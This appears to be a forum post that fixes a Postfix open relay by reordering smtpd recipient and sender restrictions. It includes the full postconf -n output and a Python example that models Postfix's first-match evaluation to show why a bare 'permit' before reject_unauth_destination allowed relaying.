Apparently it is an issue of the order in which you put the parameters for smtpd_recipient_restrictions and smtpd_sender_restrictions. These are my current settings and they work:

smtpd_sender_restrictions = permit_mynetworks permit_sasl_authenticated reject_unknown_client, reject_invalid_hostname, reject_unknown_sender_domain, reject_unlisted_sender
smtpd_recipient_restrictions = permit_mynetworks permit_sasl_authenticated reject_rbl_client zen.spamhaus.org reject_unauth_destination

This is my postconf -n:

# postconf -n
alias_database = hash:/etc/aliases
alias_maps = hash:/etc/aliases
allow_percent_hack = no
broken_sasl_auth_clients = yes
command_directory = /usr/sbin
config_directory = /etc/postfix
daemon_directory = /usr/libexec/postfix
data_directory = /var/lib/postfix
debug_peer_level = 2
disable_vrfy_command = yes
home_mailbox = Maildir/
html_directory = no
inet_interfaces = all
inet_protocols = ipv4
mail_owner = postfix
mailbox_command = /usr/bin/procmail-wrapper -o -a $DOMAIN -d $LOGNAME
mailbox_size_limit = 0
mailq_path = /usr/bin/mailq.postfix
manpage_directory = /usr/share/man
mydestination = $myhostname, localhost.$mydomain, localhost, MY.DOMAIN.COM
newaliases_path = /usr/bin/newaliases.postfix
queue_directory = /var/spool/postfix
readme_directory = /usr/share/doc/postfix-2.6.6/README_FILES
relay_recipient_maps = hash:/etc/postfix/virtual
sample_directory = /usr/share/doc/postfix-2.6.6/samples
sender_bcc_maps = hash:/etc/postfix/bcc
sendmail_path = /usr/sbin/sendmail.postfix
setgid_group = postdrop
smtpd_banner = smtp
smtpd_recipient_restrictions = permit_mynetworks permit_sasl_authenticated reject_rbl_client zen.spamhaus.org reject_unauth_destination
smtpd_sasl_auth_enable = yes
smtpd_sasl_path = private/auth
smtpd_sasl_type = dovecot
smtpd_sender_restrictions = permit_mynetworks permit_sasl_authenticated reject_unknown_client, reject_invalid_hostname, reject_unknown_sender_domain, reject_unlisted_sender
smtpd_tls_CAfile = /etc/postfix/postfix.ca.pem
smtpd_tls_auth_only = yes
smtpd_tls_cert_file = /etc/postfix/postfix.cert.pem
smtpd_tls_key_file = /etc/postfix/postfix.key.pem
smtpd_tls_mandatory_ciphers = high
smtpd_tls_security_level = may
unknown_local_recipient_reject_code = 550
virtual_alias_maps = hash:/etc/postfix/virtual
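To show why the order mattered (the bare `permit` before `reject_unauth_destination` in the earlier smtpd_recipient_restrictions line versus the corrected line in this post), here is an added example, not Postfix's own code, that models Postfix's first-match walk of smtpd_recipient_restrictions for the restrictions used in this thread and runs both configurations against the relay attempt seen in the logs. The local domain, the mynetworks range and the DNSBL listing are constructed stand-ins so it runs offline.

```python
"""First-match model of how Postfix walks smtpd_recipient_restrictions.

Added example, not Postfix's own code. Only the restrictions used in this
thread are modelled; mynetworks and the DNSBL are constructed in-memory data
so the script runs offline. Postfix 2.6 semantics are assumed: tokens are
evaluated left to right, the first PERMIT or REJECT decides, and running off
the end of the list permits.
"""
from dataclasses import dataclass
import ipaddress

LOCAL_DOMAINS = {"mydomain.com"}                    # assumed stand-in for mydestination
MYNETWORKS = [ipaddress.ip_network("127.0.0.0/8")]  # assumed loopback-only mynetworks
DNSBL_LISTED = {"203.0.113.9"}                      # constructed stand-in for a DNSBL hit

# The two configurations from the thread: the one that relayed, and the fix.
OPEN_RELAY_CONFIG = ("reject_rbl_client zen.spamhaus.org permit_mynetworks permit "
                     "reject_unauth_destination")
FIXED_CONFIG = ("permit_mynetworks permit_sasl_authenticated "
                "reject_rbl_client zen.spamhaus.org reject_unauth_destination")


@dataclass
class Session:
    client_ip: str
    sasl_authenticated: bool
    rcpt_domain: str


def tokenize(config):
    # postconf accepts whitespace and/or commas between list entries
    return config.replace(",", " ").split()


def in_mynetworks(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in MYNETWORKS)


def evaluate(config, s):
    """Return (decision, warnings) for one RCPT TO; decision is PERMIT or REJECT."""
    tokens, warnings, i = tokenize(config), [], 0
    while i < len(tokens):
        tok = tokens[i]
        i += 1
        if tok == "permit_mynetworks" and in_mynetworks(s.client_ip):
            return "PERMIT", warnings
        if tok == "permit_sasl_authenticated" and s.sasl_authenticated:
            return "PERMIT", warnings
        if tok == "reject_rbl_client":
            i += 1                          # skip the DNSBL zone argument
            if s.client_ip in DNSBL_LISTED:
                return "REJECT", warnings
        if tok == "reject_unauth_destination" and s.rcpt_domain.lower() not in LOCAL_DOMAINS:
            return "REJECT", warnings       # logged as "Relay access denied"
        if tok == "permit":
            # Unconditional: nothing after it can run. Postfix logs the warning
            # seen in the thread for the restriction that follows the permit.
            if i < len(tokens):
                warnings.append(f"restriction `{tokens[i]}' after `permit' is ignored")
            return "PERMIT", warnings
    return "PERMIT", warnings


def passes_startup_check(config):
    """Postfix refuses to start unless one of these appears in the list. The
    check is for presence only, not reachability, which is why the open
    configuration started fine and still relayed."""
    required = {"reject_unauth_destination", "check_relay_domains",
                "reject", "defer", "defer_if_permit"}
    return bool(required & set(tokenize(config)))


if __name__ == "__main__":
    # The unauthenticated external client from the thread, targeting gmail.com
    attacker = Session("91.73.219.154", False, "gmail.com")
    for name, cfg in (("open", OPEN_RELAY_CONFIG), ("fixed", FIXED_CONFIG)):
        decision, warns = evaluate(cfg, attacker)
        print(f"[{name}] startup check: {passes_startup_check(cfg)}, "
              f"relay attempt: {decision} {' '.join(warns)}")
```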